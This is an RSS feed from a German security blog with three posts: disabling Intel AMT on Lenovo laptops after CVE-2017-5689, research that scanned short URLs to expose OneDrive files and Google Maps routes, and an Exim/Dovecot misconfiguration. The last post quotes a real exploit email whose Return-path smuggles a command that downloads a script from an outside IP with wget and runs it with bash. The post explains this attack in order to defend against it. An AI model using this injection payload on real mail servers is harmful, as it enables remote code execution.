<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    
    <title>Netz - Rettung - Recht (Artikel mit Tag security)</title>
    <link>https://netz-rettung-recht.de/</link>
    <description>Bloggen seit Juni 2003</description>
    <dc:language>de</dc:language>
    <generator>Serendipity 2.5.0 - http://www.s9y.org/</generator>
    <pubDate>Mon, 15 May 2017 05:46:18 GMT</pubDate>

    <image>
    <url>https://netz-rettung-recht.de/templates/2k11/img/s9y_banner_small.png</url>
    <title>RSS: Netz - Rettung - Recht - Bloggen seit Juni 2003</title>
    <link>https://netz-rettung-recht.de/</link>
    <width>100</width>
    <height>21</height>
</image>

<item>
    <title>Lenovo Laptops und Intels AMT</title>
    <link>https://netz-rettung-recht.de/archives/1993-Lenovo-Laptops-und-Intels-AMT.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>https://netz-rettung-recht.de/archives/1993-Lenovo-Laptops-und-Intels-AMT.html#comments</comments>
    <wfw:comment>https://netz-rettung-recht.de/wfwcomment.php?cid=1993</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://netz-rettung-recht.de/rss.php?version=2.0&amp;type=comments&amp;cid=1993</wfw:commentRss>
    

    <author>nospam@example.com (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Neuere Prozessoren und Chipsätze von Intel verfügen über eine &lt;em&gt;Management Engine&lt;/em&gt; (ME), einen gesonderten Prozessor, der von der CPU und dem laufenden Betriebssystem unabhängig ist. Auf diesem Prozessor kann unter anderem eine &lt;em&gt;Active Management Technology&lt;/em&gt; (AMT) genannte Software laufen, die eine Fernkonfiguration ermöglichen soll, bspw. zur Verwaltung von Rechnern innerhalb einer größeren Organisation mit eigener IT-Abteilung.&lt;/p&gt;

&lt;p&gt;Lenovo bietet Laptops mit Intels &lt;em&gt;vPro&lt;/em&gt;-Technologie an, zu der auch &lt;em&gt;AMT&lt;/em&gt; gehört.&lt;/p&gt;

&lt;p&gt;Leider enthält der &lt;em&gt;AMT&lt;/em&gt;-Code eine gravierende Schwachstelle, die einen Zugriff &lt;strong&gt;ohne Passwort&lt;/strong&gt; ermöglicht.&lt;/p&gt;

&lt;h3 id=&quot;-me-und-amt-&quot;&gt;&lt;em&gt;ME&lt;/em&gt; und &lt;em&gt;AMT&lt;/em&gt;&lt;/h3&gt;

&lt;p&gt;Die &lt;em&gt;ME&lt;/em&gt; läuft &amp;#8220;unterhalb&amp;#8221; des Betriebssystem auf Hardware-Ebene; Schwachstellen im Code betreffen daher nicht nur Windows-Rechner, sondern jeden Rechner mit diesem Chipsatz. Bei aktivierter &lt;em&gt;AMT&lt;/em&gt; werden Zugriffe u.a. auf Port 16992 und 16993 bereits auf Ebene der Netzwerkkarte zur &lt;em&gt;AMT&lt;/em&gt; umgeleitet; das Betriebssystem bekommt diese Pakete gar nicht erst zu sehen. Das gilt nach allem, was man weiß, ggf. auch für das WLAN-Interface, also nicht nur für die drahtgebundene Netzwerkschnittstelle. Auf diesen Ports lauscht ein interner Webserver, der nach Angabe eines Passworts den Zugriff auf Fernwartungsaufgaben ermöglicht, so dass u.a. ein Reboot des Rechners ausgelöst werden kann, aber auch Zugriff auf eine serielle Konsole und die Angabe eines externen Bootmediums soll möglich sein. Es ist also denkbar, den Rechner neu zu starten und von einem Image aus dem Netz booten zu lassen.&lt;/p&gt;

&lt;h3 id=&quot;-silent-bob-is-silent-&quot;&gt;&lt;em&gt;Silent Bob is Silent&lt;/em&gt;&lt;/h3&gt;

&lt;p&gt;Der &lt;em&gt;AMT&lt;/em&gt;-Webserver enthält eine Schwachstelle, die den Namen &lt;a href=&quot;https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf&quot; title=&quot;Attention Required! | Cloudflare&quot;&gt;&lt;em&gt;Silent Bob is Silent&lt;/em&gt;&lt;/a&gt; &lt;em&gt;[PDF]&lt;/em&gt; erhalten hat und unter &lt;strong&gt;CVE-2017-5689&lt;/strong&gt; registriert wurde. Diese Schwachstelle ermöglicht unter Angabe eines leeren Passworts unbeschränkten Admin-Zugriff auf die &lt;em&gt;AMT&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Bei entsprechender Konfiguration ist ein Rechner (bspw. ein Laptop) also über jedes WLAN, in dem er sich anmeldet, angreifbar.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Matthew Garrett&lt;/em&gt; beschreibt diese Schwachstelle und ihre Implikationen in zwei Blogbeiträgen:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href=&quot;http://mjg59.dreamwidth.org/48429.html&quot; title=&quot;301 Moved Permanently&quot;&gt;Intel&amp;#8217;s remote AMT vulnerablity&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href=&quot;http://mjg59.dreamwidth.org/48837.html&quot; title=&quot;301 Moved Permanently&quot;&gt;Intel AMT on wireless networks&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Die Schwachstelle betrifft gleichermaßen &lt;em&gt;Intel Standard Manageability&lt;/em&gt; (ISM) und &lt;em&gt;Small Business Technology&lt;/em&gt; (SBT).&lt;/p&gt;

&lt;p&gt;Eine Behebung kann nur per Firmware-Update erfolgen, sobald ein solches zur Verfügung steht.&lt;/p&gt;

&lt;h3 id=&quot;-amt-auf-lenovo-laptops-deaktivieren&quot;&gt;&lt;em&gt;AMT&lt;/em&gt; auf Lenovo-Laptops deaktivieren&lt;/h3&gt;

&lt;p&gt;Auf den Laptops von Lenovo (mit &lt;em&gt;vPro&lt;/em&gt;-Technologie) ist &lt;em&gt;AMT&lt;/em&gt; bei Auslieferung bereits aktiviert, die Rechner sind also prinzipiell verwundbar. Lenovo bietet in seinem Advisory eine umfangreichee &lt;a href=&quot;https://support.lenovo.com/de/de/product_security/len-14963&quot; title=&quot;Intel Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability Remote Privilege Escalation - Lenovo Support DE&quot;&gt;Liste der betroffenen Rechner&lt;/a&gt; an.&lt;/p&gt;

&lt;p&gt;Im BIOS lässt sich &lt;em&gt;AMT&lt;/em&gt; scheinbar deaktivieren; nach allem, was bekannt ist, steuert diese Option aber nur die Zugriffsmöglichkeit des Nutzers auf die &lt;em&gt;AMT&lt;/em&gt;-Konfiguration. Wird &lt;em&gt;AMT&lt;/em&gt; hier deaktiviert (und das BIOS ggf. per Passwort gegen Änderungen geschützt), kann der Nutzer &lt;em&gt;AMT&lt;/em&gt; nicht mehr konfigurieren; im Gegenteil wird es offenbar sogar auf eine Standardkonfiguration zurückgesetzt. &lt;em&gt;AMT&lt;/em&gt; muss daher im BIOS aktiviert bleiben; (erst) dann ist der Zugriff auf die &lt;em&gt;Management Engine BIOS Extension&lt;/em&gt; (MEBx) möglich, mit der &lt;em&gt;AMT&lt;/em&gt; dann konfiguriert und insbesondere deaktiviert werden kann. Diese ist am Anfang des Bootvorgangs über &lt;kbd&gt;Ctrl&lt;/kbd&gt;-&lt;kbd&gt;P&lt;/kbd&gt; zugänglich.&lt;/p&gt;

&lt;p&gt;Im Lenovo-Forum findet sich eine Beschreibung der Vorgehensweise im Thread &lt;a href=&quot;https://forums.lenovo.com/t5/ThinkPad-T400-T500-and-newer-T/T420-How-to-completely-deactivate-Intel-AMT/td-p/2131366&quot; title=&quot;ERROR: The request could not be satisfied&quot;&gt;T420: How to completely deactivate Intel AMT&lt;/a&gt;. Die Angaben dort passen &lt;em&gt;mutatis mutandis&lt;/em&gt; auch auf einen T520.&lt;/p&gt;

&lt;p&gt;Was dort nicht erwähnt wird: das Standardpasswort ist &lt;code&gt;admin&lt;/code&gt;, und es muss zunächst geändert werden. Das neue Passwort muss allerdings bestimmten &lt;a href=&quot;https://software.intel.com/en-us/blogs/2007/11/08/strong-amt-me-passwords-and-other-shades-of-gray/&quot; title=&quot;Access Denied&quot;&gt;Mindestanforderungen&lt;/a&gt; gehorchen. Ist das nicht der Fall, wird es mit einer weitgehend nichtssagenden Fehlermeldung nicht gespeichert. Danach allerdings lässt sich &lt;em&gt;AMT&lt;/em&gt; deaktivieren. Der Webserver auf Port 16992 ist dann weiter erreichbar, nimmt aber keine Anmeldungen mehr entgegen.&lt;/p&gt;

&lt;p&gt;Ein lokaler Nutzer kann diese Dienste allerdings jederzeit wieder aktivieren, solange nicht auch der &lt;em&gt;Local Manageability Service&lt;/em&gt; (LMS) deinstalliert wird.&lt;/p&gt;

&lt;h3 id=&quot;weitere-ressourcen&quot;&gt;Weitere Ressourcen&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href=&quot;https://mattermedia.com/blog/disabling-intel-amt/&quot; title=&quot;404 Not Found&quot;&gt;Disabling Intel AMT on Windows (and a simpler CVE-2017-5689 Mitigation Guide)&lt;/a&gt;&lt;br /&gt;
Eine alternative Vorgehensweise zur Deaktivierung.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href=&quot;https://www.ssh.com/vulnerability/intel-amt/&quot; title=&quot;&quot;&gt;Intel AMT Vulnerability Tracking Page&lt;/a&gt;&lt;br /&gt;
Übersicht und Linksammlung&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href=&quot;https://downloadmirror.intel.com/26754/eng/Intel-SA-00075%20Mitigation%20Guide-Rev%201.2.pdf&quot; title=&quot;ERROR: The request could not be satisfied&quot;&gt;INTEL-SA-00075 Mitigation Guide&lt;/a&gt; &lt;em&gt;[PDF]&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;img src=&quot;https://ssl-vg03.met.vgwort.de/na/d923bccbaeed4de58223d755ea968c90&quot; width=&quot;1&quot; height=&quot;1&quot; alt=&quot;&quot;&gt; 
    </content:encoded>

    <pubDate>Mon, 15 May 2017 04:50:00 +0000</pubDate>
    <guid isPermaLink="false">https://netz-rettung-recht.de/archives/1993-guid.html</guid>
    <category>lenovo</category>
<category>security</category>

</item>
<item>
    <title>Das &quot;Erraten&quot; geheimer URLs</title>
    <link>https://netz-rettung-recht.de/archives/1907-Das-Erraten-geheimer-URLs.html</link>
            <category>Netzleben</category>
    
    <comments>https://netz-rettung-recht.de/archives/1907-Das-Erraten-geheimer-URLs.html#comments</comments>
    <wfw:comment>https://netz-rettung-recht.de/wfwcomment.php?cid=1907</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://netz-rettung-recht.de/rss.php?version=2.0&amp;type=comments&amp;cid=1907</wfw:commentRss>
    

    <author>nospam@example.com (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Ab und an hat man als Nutzer den Wunsch, ein Dokument, ein Bild oder eine andere Datei mit Freunden, Bekannten oder Kollegen zu teilen. Dafür lassen sich mittlerweile Cloud-Speicherdienste wie &lt;a href=&quot;https://www.dropbox.com/&quot; title=&quot;Dropbox.com&quot;&gt;Dropbox&lt;/a&gt;, &lt;a href=&quot;https://www.google.com/drive/&quot; title=&quot;302 Moved&quot;&gt;Google Drive&lt;/a&gt; oder auch Microsofts &lt;a href=&quot;https://onedrive.live.com/&quot; title=&quot;Object moved&quot;&gt;OneDrive&lt;/a&gt; nutzen, die nicht nur Dateien speichern, sondern auch zwischen verschiedenen Rechnern synchronisieren und für Dritte abrufbar machen können. Zumindest früher war es hingegen üblich (und ist vielleicht auch jetzt noch hier und da verbreitet), einfach den eigenen Webspace für diese Zwecke zu nutzen, also die Datei hochzuladen und den Adressaten die URL bzw. den Link mitzuteilen.&lt;/p&gt;

&lt;h3 id=&quot;security-by-obscurity&quot;&gt;Security by obscurity&lt;/h3&gt;

&lt;p&gt;Gar nicht so selten wurde dabei - und wird auch weiterhin bei den Cloud-Diensten - darauf gesetzt, dass schon niemand den richtigen Dateinamen wird erraten können, so dass auf Zugriffskontrollen (im einfachsten Falle per &lt;code&gt;.htaccess&lt;/code&gt;-Datei des Webservers oder vergleichbaren Mechanismen) verzichtet wird. Gerade bei den Cloud-Diensten ist eine Zugriffskontrolle oft auch nur möglich, wenn jeder Nutzer selbst über einen Account bei diesem Dienst verfügt, was nicht immer der Fall ist. Diese Vorgehensweise stellt natürlich ein kalkuliertes Risiko dar, geht aber meistens wohl gut - wenn man die simple Vorsichtsmaßnahme beachtet, seinem Webserver zu verbieten, Verzeichnisinhalte anzuzeigen, und wenn die URL nicht auf irgendeine Weise Dritten - insbesondere einer Suchmaschine - bekannt wird. Letztere Gefahr sollte man nicht unterschätzen; führt bspw. aus dem zu teilenden Dokument ein Hyperlink zu anderen Inhalten, übermittelt der Browser die &amp;#8220;geheime&amp;#8221; URL in der Regel als Teil des &lt;em&gt;Referer&lt;/em&gt;-Headers. Als böse Falle können sich auch Webserver-Zugriffsstatistiken erweisen, die ungeschützt im Netz stehen, oder auch Browser und deren Add-Ins, die zu welchem Zweck auch immer die Adressen der besuchten Webseiten bzw. -dokumente an Dritte übermitteln, oder Proxy-Server, oder ungesicherte WLANs, oder &amp;#8230; Insgesamt erscheint das Risiko jedoch überschaubar.&lt;/p&gt;

&lt;p&gt;Wirklich problematisch allerdings wird es, wenn die &amp;#8220;geheime&amp;#8221; URL sich erraten oder durch simples Ausprobieren erreichen lässt. Und dieses Problem haben - prinzipbedingt - die beliebten URL-Verkürzer wie &lt;em&gt;bit.ly&lt;/em&gt;, &lt;em&gt;goo.gl&lt;/em&gt; und Co.&lt;/p&gt;

&lt;h3 id=&quot;url-shortener-und-geheime-urls&quot;&gt;URL-Shortener und &amp;#8220;geheime&amp;#8221; URLs&lt;/h3&gt;

&lt;p&gt;Nicht nur, dass bei deren Nutzung die &amp;#8220;geheime&amp;#8221; URL jedenfalls an den Betreiber des Verkürzungsdienstes übermittelt wird, ohne Kontrolle, was dieser damit anfängt: gerade die Kürze der generierten &amp;#8220;short URLs&amp;#8221; erlaubt es, diese - oder einen Teil des entsprechenden Adressraums - einfach auf gut Glück abzusuchen. Genau das haben zwei Forscher von &lt;em&gt;&lt;a href=&quot;http://tech.cornell.edu/&quot; title=&quot;301 Moved Permanently&quot;&gt;Cornell Tech&lt;/a&gt;&lt;/em&gt;, einem Campus der &lt;em&gt;Cornell University&lt;/em&gt;, getan und die Ergebnisse dann &lt;a href=&quot;http://arxiv.org/pdf/1604.02734v1.pdf&quot; title=&quot;&quot;&gt;veröffentlicht&lt;/a&gt;. Dabei haben sie nicht wahllos gesucht, sondern sich zwei spezielle Anwendungsfälle ausgeguckt: einmal Microsoft &lt;em&gt;OneDrive&lt;/em&gt; und einmal &lt;em&gt;Google Maps&lt;/em&gt;. Das Ergebnis war &lt;a href=&quot;https://freedom-to-tinker.com/blog/vitaly/gone-in-six-characters-short-urls-considered-harmful-for-cloud-services/&quot; title=&quot;&quot;&gt;erschreckend&lt;/a&gt;.&lt;/p&gt;

&lt;h4 id=&quot;-onedrive-&quot;&gt;&lt;em&gt;OneDrive&lt;/em&gt;&lt;/h4&gt;

&lt;p&gt;&lt;em&gt;OneDrive&lt;/em&gt; ermöglicht es demnach, für einzelne Dateien oder ganze Ordner einen Kurz-Link innerhalb der Domain &lt;em&gt;1drv.ms&lt;/em&gt; generieren zu lassen, unter dem anderen diese Dateien oder Ordner dann aufrufen lassen. Dahinter steht der Dienst von &lt;em&gt;bit.ly&lt;/em&gt;, so dass die generierten Kurzlinks auch unter dieser Domain aufrufbar sind. Und die Kurzlinks sind wirklich kurz, nämlich nur 5-7 Zeichen lang. Bei wahllosem Aufruf von 100 Mio. Kurzlinks mit sechs alphanumerischen Zeichen waren immerhin 42% tatsächlich für Weiterleitungen in Gebrauch; knapp 20.000 davon (0,02%) waren tatsächlich - dann ungeschützte - &lt;em&gt;OneDrive&lt;/em&gt;-Dateien oder -Verzeichnisse.&lt;/p&gt;

&lt;p&gt;Damit nicht genug: nach dem Bericht der Forscher lässt sich aus der Struktur der &lt;em&gt;OneDrive&lt;/em&gt;-URLs die URL des Wurzelverzeichnisses des betroffenen Accounts ablesen. Von da aus lassen sich dann &lt;em&gt;alle&lt;/em&gt; Dateien abrufen, die mit jedermann oder derselben Gruppe wie die ursprüngliche Datei geteilt wurden. Das führte dann schon zu der 10fachen Anzahl, nämlich über 200.000, Dokumenten, die so abrufbar waren. Ein erneuter Versuch mit 100 Mio. Abrufen von siebenstelligen Kurzlinks führte mit dieser Methode zu insgesamt 1,1 Mio. (!) Dokumenten, auf die die Forscher hätten zugreifen können.&lt;/p&gt;

&lt;p&gt;Und, noch schlimmer: rund 7% der entdeckten &lt;em&gt;OneDrive&lt;/em&gt;-Verzeichnisse war nicht nur lesend, sondern auch schreibend freigegeben, bot also die Möglichkeit, dort gespeicherte Daten zu verändern oder virenverseuchte Dateien hochzuladen, die dann automatisch auf alle mit dem Account verbundenen Rechner repliziert werden. Ein Alptraum.&lt;/p&gt;

&lt;p&gt;Die Forscher geben an, dass Microsofts &lt;em&gt;Security Response Center&lt;/em&gt; (MSRC) sich davon allerdings weitgehend unbeeindruckt gezeigt habe; nach einem Mailwechsel, der sich über zwei Monate hinzog, habe man sie im August 2015 beschieden, das geschilderte Verhalten von &lt;em&gt;OneDrive&lt;/em&gt; sei so vorgesehen (&amp;#8220;by design&amp;#8221;) und daher kein Fall für das MSRC. Angeblich unabhängig davon sei aber seit März 2016 die Erzeugung von Kurz-URLs nicht mehr möglich; auch sei die URL-Struktur der Accounts nicht mehr vorhersagbar, so dass es nicht mehr möglich sei, von einer Datei oder einem Verzeichnis aus den gesamten Account zu durchsuchen. Die bisherigen Kurz-URLs seien aber weiter verfügbar.&lt;/p&gt;

&lt;h4 id=&quot;-google-maps-&quot;&gt;&lt;em&gt;Google Maps&lt;/em&gt;&lt;/h4&gt;

&lt;p&gt;Auch &lt;em&gt;Google Maps&lt;/em&gt; bietet einen URL-Verkürzer für Kartenausschnitte und Navigationsrouten an. Ein zufälliger Abruf von rund 64 Mio. der fünfstelligen &lt;em&gt;Tokens&lt;/em&gt; führte zu rund 24 Mio. vorhandenen Zielen; immerhin 10% davon und damit über 2 Mio. waren Routen mit Start und Ziel. Unter den Zielen waren psychiatrische Krankenhäuser und onkologische Fachkliniken, Suchtbehandlungsstellen, Abtreibungskliniken, Gefängnisse und Jugendarrestanstalten, Vergnügungsetablissements und andere Ziele, die die Ersteller dieser Routen - die nicht selten aufgrund des Startpunktes identifizierbar waren - sicherlich nur ungern veröffentlicht gesehen haben würden. So gelang es den Forschern, Name, Adresse und Alter einer jungen Frau zu ermitteln, deren Routenplanung zu einer reproduktionsmedizinischen Einrichtung führte; in einem anderen Fall identifizierte die Vielzahl der gespeicherten Routen, die teilweise zu den Standorten von Geocaches führten, den betreffenden Nutzer als eifrigen Geocacher.&lt;/p&gt;

&lt;p&gt;Das &lt;em&gt;Google Security Team&lt;/em&gt; immerhin hat auf den Hinweis unverzüglich reagiert. Seit September 2015 werden für &lt;em&gt;Google Maps&lt;/em&gt; 11-12stellige &amp;#8220;Tokens&amp;#8221; erzeugt, und der massenhafte Abruf (&amp;#8220;Scan&amp;#8221;) bestehender Kurz-URLs wird - sofern als solcher erkennbar - unterbunden.&lt;/p&gt;

&lt;h3 id=&quot;fazit&quot;&gt;Fazit&lt;/h3&gt;

&lt;p&gt;Eigentlich ist all das nicht neu: jedermann weiß, kann wissen oder könnte sich denken, dass einerseits ungeschützte Dateien auch durch Unbefugte abgerufen werden können, wenn sie denn wissen, wo, und dass andererseits kurze URLs leicht &amp;#8220;abgegrast&amp;#8221; werden können. Dennoch ist dieses Zusammenspiel meines Erachtens doch in seinen Implikationen einigermaßen überraschend - gerade wenn man an das Beispiel &lt;em&gt;Google Maps&lt;/em&gt; denkt. Ob wirklich jedem klar ist, der einen Kurzlink zu einer bestimmten Route erstellt, um diese nur mit sich selbst zu &amp;#8220;teilen&amp;#8221;, wenn er sie noch einmal braucht, dass möglicherweise auch Unbefugte an diese Route gelangen und ggf. Rückschlüsse auf die eigene Person und das soziale Umfeld ziehen können? Ich glaube nicht.&lt;/p&gt;
&lt;img src=&quot;https://ssl-vg03.met.vgwort.de/na/1a183685e6d647d5b96f5f920fca495a&quot; width=&quot;1&quot; height=&quot;1&quot; alt=&quot;&quot;&gt; 
    </content:encoded>

    <pubDate>Fri, 22 Apr 2016 17:00:00 +0000</pubDate>
    <guid isPermaLink="false">https://netz-rettung-recht.de/archives/1907-guid.html</guid>
    <category>security</category>

</item>
<item>
    <title>Vom Advisory zum Exploit binnen eines Tages</title>
    <link>https://netz-rettung-recht.de/archives/1701-Vom-Advisory-zum-Exploit-binnen-eines-Tages.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>https://netz-rettung-recht.de/archives/1701-Vom-Advisory-zum-Exploit-binnen-eines-Tages.html#comments</comments>
    <wfw:comment>https://netz-rettung-recht.de/wfwcomment.php?cid=1701</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://netz-rettung-recht.de/rss.php?version=2.0&amp;type=comments&amp;cid=1701</wfw:commentRss>
    

    <author>nospam@example.com (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Am Freitag, dem dritten Mai, wurde ein &lt;a title=&quot;Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution&quot; href=&quot;https://www.redteam-pentesting.de/advisories/rt-sa-2013-001&quot;&gt;Warnhinweis&lt;/a&gt; (&lt;em&gt;Advisory&lt;/em&gt;) auf eine weit verbreitete Fehlkonfiguration in der Kombination von &lt;em&gt;&lt;a title=&quot;Exim Internet Mailer&quot; href=&quot;http://www.exim.org/&quot;&gt;Exim&lt;/a&gt; &lt;/em&gt;mit &lt;em&gt;&lt;a title=&quot;Dovecot - secure IMAP server&quot; href=&quot;http://dovecot.org/&quot;&gt;Dovecot&lt;/a&gt; &lt;/em&gt;publiziert: ein offenbar seit 23.10.2009 im Dovecot-Wiki veröffentliches Konfigurationsbeispiel für &lt;em&gt;Exim&lt;/em&gt;, mit dem eingehende E-Mails durch den zu &lt;em&gt;Dovecot &lt;/em&gt;gehörenden LDA &lt;em&gt;deliver &lt;/em&gt;ausgeliefert werden sollen, enthielt auch die Option &amp;quot;&lt;em&gt;use_shell&lt;/em&gt;&amp;quot;, die dazu führt, dass der Aufruf insgesamt zur Ausführung an die Shell weitergegeben wird. Das is potentiell unsicher, wie auch die Exim-Dokumentation &lt;a title=&quot;Exim: The pipe transport - How the command is run&quot; href=&quot;http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_pipe_transport.html#SECThowcommandrun&quot;&gt;erläutert&lt;/a&gt;:&lt;/p&gt;

&lt;blockquote&gt; 
&lt;p&gt;Not running the command under a shell (by default) lessens the security risks
in cases when a command from a user’s filter file is built out of data that was
taken from an incoming message. If a shell is required, it can of course be
explicitly specified as the command to be run. However, there are circumstances
where existing commands (for example, in &lt;em&gt;&lt;span class=&quot;docbook_filename&quot;&gt;.forward&lt;/span&gt; &lt;/em&gt;files) expect to be run
under a shell and cannot easily be modified. To allow for these cases, there is
an option called &lt;span class=&quot;docbook_option&quot;&gt;use_shell&lt;/span&gt;, which changes the way the &lt;span class=&quot;docbook_command&quot;&gt;pipe&lt;/span&gt; transport
works. Instead of breaking up the command line as just described, it expands it
as a single string and passes the result to &lt;em&gt;&lt;span class=&quot;docbook_filename&quot;&gt;/bin/sh&lt;/span&gt;&lt;/em&gt;. The
&lt;span class=&quot;docbook_option&quot;&gt;restrict_to_path&lt;/span&gt; option and the $pipe_addresses facility cannot be used
with &lt;span class=&quot;docbook_option&quot;&gt;use_shell&lt;/span&gt;, and the whole mechanism is inherently less secure.&lt;/p&gt; 
&lt;/blockquote&gt;

&lt;p&gt;Wenn es jemandem gelingt, ausführbaren Code in diesen Aufruf einzuschleusen, kann er fremden Code mit den Rechten von Exim ausführen, die im Moment der Auslieferung von Mail mit dem LDA &lt;em&gt;deliver&lt;/em&gt; bestenfalls Zugriff auf alle Mailboxen ermöglichen und bei leichtsinniger Konfiguration - die im Dovecot-Wiki als eine Konfigurationsmöglichkeit ausdrücklich genannt wird! - schlimmstenfalls sogar &lt;em&gt;root&lt;/em&gt; sind. Und dieses Einschleusen ist ausgesprochen einfach, enthält der Aufruf von &lt;em&gt;deliver&lt;/em&gt; doch u.a. den Absender der E-Mail, den sog. &lt;em&gt;Envelope-From&lt;/em&gt; (oder auch &lt;em&gt;Return-Path&lt;/em&gt;), bspw. so:
&lt;code&gt;command = /usr/local/libexec/dovecot/dovecot-lda -d $local_part@$domain -f $sender_address&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;$sender_address&lt;/em&gt; ist hier der problematische Parameter, denn diesen Parameter kann der Absender der E-Mail frei setzen. Durch die Option &lt;em&gt;use_shell&lt;/em&gt; wird der obige Aufruf nach Ersatz der Variablen ohne jede Modifikation komplett an die Shell übergeben und ggf. entsprechender Code ausgeführt.&lt;/p&gt;

&lt;p&gt;Am 02.05.2013 wurde das Beispiel im Wiki für &lt;a href=&quot;http://wiki1.dovecot.org/LDA/Exim?action=diff&amp;amp;rev2=17&amp;amp;rev1=16&quot; title=&quot;Änderung am 02.05.2013&quot;&gt;Dovecot 1.x&lt;/a&gt; und auch in der Dokumentation für &lt;a href=&quot;http://wiki2.dovecot.org/LDA/Exim?action=diff&amp;amp;rev2=22&amp;amp;rev1=21&quot; title=&quot;Änderung am 02.05.2013&quot;&gt;Dovecot 2.x&lt;/a&gt; berichtigt, am 03.05.2013 wurde das Advisoy veröffentlicht.&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Und schon am Abend des Folgetages flog mir auf einem meiner Server folgende - ansonsten notwendige Header und vor allen auch einen Inhalt nicht enthaltende - E-Mail zu, die das Beispiel für einen Exploit aus dem Advisory abgewandelt übernommen hat:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt; 
&lt;p&gt;Return-path: &amp;lt;red`wget${IFS}178.218.211.118/b${IFS}-O${IFS}/tmp/a.pl&amp;#8220;bash${IFS}/tmp/a.pl`team@example.com&amp;gt;&lt;br /&gt;Envelope-to: postmaster@greenmeadow.szaf.org&lt;br /&gt;Delivery-date: Sat, 04 May 2013&amp;#160;21:57:19 +0200&lt;br /&gt;Received: from [178.218.211.118] (helo=abcde.com)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; by greenmeadow.szaf.org with esmtp (Exim 4.72)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; (envelope-from &amp;lt;red`wget${IFS}178.218.211.118/b${IFS}-O${IFS}/tmp/a.pl&amp;#8220;bash${IFS}/tmp/a.pl`team@example.com&amp;gt;)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; id 1UYia4-000387-Es&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; for postmaster@greenmeadow.szaf.org; Sat, 04 May 2013&amp;#160;21:57:19 +0200&lt;br /&gt;Subject: test &lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt;

&lt;p&gt;Die oben gezeigte problematische Konfiguration würde dann dazu führen, dass bei der Auslieferung der Mail die beiden folgenden Befehle mit den Rechten des Mailservers ausgeführt würden:&lt;/p&gt;

&lt;blockquote&gt; 
&lt;p&gt;&lt;font face=&quot;courier new,courier,monospace&quot;&gt;wget 178.218.211.118/b -O /tmp/a.pl&lt;br /&gt;bash /tmp/a.pl&lt;/font&gt; &lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt;

&lt;p&gt;Es würde also die Datei &lt;em&gt;b&lt;/em&gt; von der Maschine heruntergeladen und in der Datei &lt;em&gt;a.pl&lt;/em&gt; im Verzeichnis &lt;em&gt;/tmp&lt;/em&gt; gespeichert und dann ausgeführt.&lt;br /&gt; &lt;/p&gt;

&lt;p&gt;Glücklicherweise verwende ich zwar sowohl Exim als auch Dovecot, aber in einer anderen Konfiguration, so dass dieser Versuch eines Exploits kein Problem darstellte, aber man merkt einmal wieder, wie schnell nach der Veröffentlichung von Advisories man von solchen Versuchen, bestehende Programm- oder Konfigurationsfehler auszunutzen, betroffen wird.&lt;/p&gt;

&lt;p&gt;(Als ich mich damit näher beschäftigt habe, war die o.g. Datei übrigens bereits nicht mehr aufrufbar.)&lt;br /&gt;&lt;/p&gt;
&lt;img src=&quot;https://ssl-vg03.met.vgwort.de/na/7e0f5a1a53f64e8aa05bf7be6a99b9ef&quot; width=&quot;1&quot; height=&quot;1&quot; alt=&quot;&quot;&gt; 
    </content:encoded>

    <pubDate>Sun, 05 May 2013 09:29:00 +0000</pubDate>
    <guid isPermaLink="false">https://netz-rettung-recht.de/archives/1701-guid.html</guid>
    <category>dovecot</category>
<category>e-mail</category>
<category>exim</category>
<category>security</category>

</item>

</channel>
</rss>
